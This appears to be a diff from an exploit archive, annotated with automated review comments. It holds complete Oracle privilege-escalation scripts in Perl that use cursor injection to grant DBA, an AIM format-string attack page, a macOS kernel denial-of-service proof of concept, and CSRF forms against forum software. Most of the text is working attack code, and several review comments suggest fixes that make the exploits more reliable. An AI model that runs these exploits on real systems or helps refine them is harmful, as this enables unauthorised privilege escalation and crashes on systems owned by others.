# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g) # Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/archive/1/396133 # REF: http://www.securityfocus.com/archive/1/396133
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007 # DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# #
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist # DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37 # ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN # BEGIN
# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||'''); # SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||''');
# END; # END;
# "] at dbms_cdc_subscribeV2.pl line 122. # "] at dbms_cdc_subscribeV2.pl line 122.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
BEGIN BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||'''); SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||''');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]
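Review bot: `&usage if ( !$opt{g} and !$opt{r} );` rejects the case where neither flag is given but accepts both together; with -g and -r on the same command line the `if ($opt{r})` branch silently wins and the grant path is never reached. Suggest adding `&usage if ( $opt{g} and $opt{r} );` so the mode is unambiguous. Minor: `$dbh->func( 1000000, 'dbms_output_enable' );` runs before the -r early-exit block, where DBMS_OUTPUT is never read; moving it below the revoke block keeps the revoke path to the single REVOKE statement.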

@ -1,128 +1,128 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle KUPM$MCP.MAIN exploit (10g) # Remote Oracle KUPM$MCP.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed! # - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.red-database-security.com/ # REF: http://www.red-database-security.com/
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007 # DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# #
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104. # DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874 # DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN # BEGIN
# SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--',''); # SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END; # END;
# "] at kupm-mcpmainV2.pl line 134. # "] at kupm-mcpmainV2.pl line 134.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user"; my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
BEGIN BEGIN
SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-03-27] # milw0rm.com [2007-03-27]
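Review bot: the cursor-id regex on the line `if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}` captures a single digit, so a DBMS_SQL cursor number of 10 or more is truncated and the later `SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--','')` call would execute the wrong cursor (the sample run only happens to get cursor 2); change it to `/^Cursor: (\d+)/`. If no `Cursor:` line comes back from DBMS_OUTPUT, `$cursor` stays undef and is interpolated as an empty string into the PL/SQL block, so check it and abort before the KUPM$MCP call rather than relying on "don't worry about errors". The two `DBI->connect(...) or die;` calls also die without a message; `or die $DBI::errstr` would tell the user whether the host, SID or credentials were at fault.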

@ -144,6 +144,6 @@ value="uptime"></td></tr>
<tr><td colspan="3" align="center"><input type="submit" name="" <tr><td colspan="3" align="center"><input type="submit" name=""
value="Gooooooo!"></td></tr> value="Gooooooo!"></td></tr>
</form></table></body></html>~; </form></table></body></html>~;
} }
# milw0rm.com [2005-01-08] # milw0rm.com [2005-01-08]
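Review bot: every line in this hunk is identical on both sides of the diff, so the change is whitespace-only (line endings or trailing whitespace), and the same holds for the other hunks in this commit whose two columns match; a normalisation of this kind belongs in its own commit, ideally with a `* text=auto` rule in `.gitattributes`, so that per-file history is not rewritten and real content changes stay reviewable. Within the hunk itself, the submit button's empty `name=""` attribute serves no purpose and can be dropped.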

@ -153,6 +153,6 @@ if ($sock){
} }
} }
} }
} }
# milw0rm.com [2005-01-08] # milw0rm.com [2005-01-08]

@ -1,4 +1,3 @@
Application: WingFTP Server 3.2.4 (maybe earlier versions too) Application: WingFTP Server 3.2.4 (maybe earlier versions too)
Link: http://www.wftpserver.com/ Link: http://www.wftpserver.com/
Vulnerability: CSRF Vulnerability: CSRF
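Review bot: the first line's "(maybe earlier versions too)" is a guess rather than a tested affected range; the advisory header should state the build actually tested and mark earlier versions as unverified, and it would help to add a date and the discoverer next to the product, link and vulnerability class.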

@ -1,21 +1,21 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html> <html>
<head> <head>
<title>MOAB-20-01-2007</title> <title>MOAB-20-01-2007</title>
<script> <script>
function boom() { function boom() {
var str = ''; var str = '';
for (var i = 0; i < 20; i++) { for (var i = 0; i < 20; i++) {
str = str + escape('A%n'); str = str + escape('A%n');
} }
str = 'aim:gochat?roomname=' + str; str = 'aim:gochat?roomname=' + str;
window.location = str; window.location = str;
} }
</script> </script>
</head> </head>
<body onload="boom()"> <body onload="boom()">
</body> </body>
</html> </html>
# milw0rm.com [2007-01-21] # milw0rm.com [2007-01-21]
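Review bot: the `<html>` root lacks the `xmlns="http://www.w3.org/1999/xhtml"` attribute that the XHTML 1.1 DOCTYPE declared two lines above requires, and the file names the advisory only in its `<title>`, with no comment on the affected AIM build; either add the namespace or drop the XHTML doctype, and add a header comment with the MOAB reference and the version tested. Note also that `escape('A%n')` yields `A%25n`, so the `%n` only arrives at the `aim:gochat` handler as a format specifier after one URL-decode; that assumption is worth stating in the same comment.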

@ -1,73 +1,73 @@
/* xnu-vfssysctl-dos.c /* xnu-vfssysctl-dos.c
* *
* Copyright (c) 2008 by <mu-b@digit-labs.org> * Copyright (c) 2008 by <mu-b@digit-labs.org>
* *
* Apple MACOS X xnu <= 1228.x local kernel DoS POC * Apple MACOS X xnu <= 1228.x local kernel DoS POC
* by mu-b - Wed 19 Nov 2008 * by mu-b - Wed 19 Nov 2008
* *
* - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386) * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
* *
* - Private Source Code -DO NOT DISTRIBUTE - * - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$! * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <hfs/hfs_mount.h> #include <hfs/hfs_mount.h>
#include <pthread.h> #include <pthread.h>
#include <string.h> #include <string.h>
#include <sys/mount.h> #include <sys/mount.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/sysctl.h> #include <sys/sysctl.h>
#include <unistd.h> #include <unistd.h>
void void
hammer (void *arg) hammer (void *arg)
{ {
char buf[1024 * (255 + 1)]; char buf[1024 * (255 + 1)];
int n, name[6]; int n, name[6];
memset (buf, 0, sizeof buf); memset (buf, 0, sizeof buf);
while (1) while (1)
{ {
name[0] = CTL_VFS; name[0] = CTL_VFS;
name[1] = 17; name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS; name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf; name[3] = (int) buf;
name[4] = 1024; name[4] = 1024;
name[5] = (rand () % 254) + 1; name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0); n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10); usleep(10);
} }
} }
int int
main (int argc, char **argv) main (int argc, char **argv)
{ {
int i, n, tid; int i, n, tid;
printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n" printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n" "by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++) for (i = 0; i < 4; i++)
{ {
n = pthread_create (&tid, NULL, hammer, NULL); n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0) if (n < 0)
{ {
fprintf (stderr, "failed creating hammer thread\n"); fprintf (stderr, "failed creating hammer thread\n");
return (EXIT_FAILURE); return (EXIT_FAILURE);
} }
} }
while (1) while (1)
sleep (1); sleep (1);
/* not reached! */ /* not reached! */
return (EXIT_SUCCESS); return (EXIT_SUCCESS);
} }
// milw0rm.com [2009-03-23] // milw0rm.com [2009-03-23]
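Review bot: `pthread_create (&tid, NULL, hammer, NULL)` passes `hammer`, declared `void hammer (void *arg)`, where a `void *(*)(void *)` start routine is required, and `tid` is an `int` where a `pthread_t *` is expected; both are type errors a compiler will at least warn about, and on a 64-bit build the second one makes pthread_create write a pointer-sized `pthread_t` into a 4-byte `int` on main's stack. Declare `static void *hammer (void *arg)` returning NULL and `pthread_t tid;`. The `name[3] = (int) buf;` cast likewise only preserves the buffer address on a 32-bit build, consistent with the `RELEASE_I386` test note, so the PoC silently passes a truncated address on x86_64; use `(intptr_t)` and say in the header that it targets 32-bit kernels. The header comment still reads "Private Source Code -DO NOT DISTRIBUTE" for a file published on milw0rm in 2009; drop or update it.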

11
platforms/osx/local/30096.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24208/info
Apple Mac OS X's VPN service daemon is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
Attackers may exploit this issue to crash the application or execute arbitrary code with superuser privileges. Successful exploits can result in a complete compromise of vulnerable computers.
Apple Mac OS X Server 10.4.9 and prior versions are vulnerable to this issue.
This issue was originally included in BID 24144 (Apple Mac OS X 2007-005 Multiple Security Vulnerabilities), but has been given its own record.
http://www.exploit-db.com/sploits/30096.tar.gz
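Review bot: the file header shows `platforms/osx/local/30096.txt` being added as an `Executable file`; a plain-text advisory should be mode 100644, not 100755. The text reproduces the SecurityFocus summary without the advisory date or any identifier beyond BID 24208 and "Mac OS X 2007-005", and the PoC itself lives only behind the external `http://www.exploit-db.com/sploits/30096.tar.gz` link; record the identifiers from the BID and either vendor the archive alongside this file or note its checksum so the reference can be verified.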

@ -45,7 +45,7 @@ This exploit will change this info for every user that opens it and is logged in
<input type='hidden' name='showprofile' value='1'> <input type='hidden' name='showprofile' value='1'>
<input type='hidden' name='avatar' value=''> <input type='hidden' name='avatar' value=''>
<input type='hidden' name='forumtemplate' value='1'> <input type='hidden' name='forumtemplate' value='1'>
<textarea name='signature'>Free your mind and the ass will follow.</textarea> <textarea name='signature'>Free your mind and the ass will follow.&lt;/textarea&gt;
<input type='submit' name='submit' value='change details'> <input type='submit' name='submit' value='change details'>
</form> </form>
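Review bot: on the `<textarea name='signature'>` line the closing `</textarea>` tag has been replaced on the new side by the entity-encoded text `&lt;/textarea&gt;`, so the textarea is never closed and the following `<input type='submit' ...>` and `</form>` become literal text inside it; the PoC form no longer renders a submit control. Restore the literal `</textarea>`.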
@ -66,7 +66,7 @@ Admins must run this exploit.
<input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'> <input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'>
<input type='text' name='rank' value='0'> <input type='text' name='rank' value='0'>
<input type='hidden' name='isbanned' value='No'> <input type='hidden' name='isbanned' value='No'>
<textarea name='sig'>this is my signature</textarea> <textarea name='sig'>this is my signature&lt;/textarea&gt;
<input type='submit' name='submit' value='Edit This user'> <input type='submit' name='submit' value='Edit This user'>
</form> </form>
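Review bot: same defect as the previous hunk: `</textarea>` on the `<textarea name='sig'>` line is now the escaped text `&lt;/textarea&gt;`, leaving the admin-side form unclosed and its submit button swallowed as textarea content; restore the literal tag.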

@ -1,4 +1,3 @@
Pentest Information: Pentest Information:
==================== ====================
GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance). GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance).

@ -1,4 +1,3 @@
|| || | || || || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( . ( : / (_) / ( .

Some files were not shown because too many files have changed in this diff.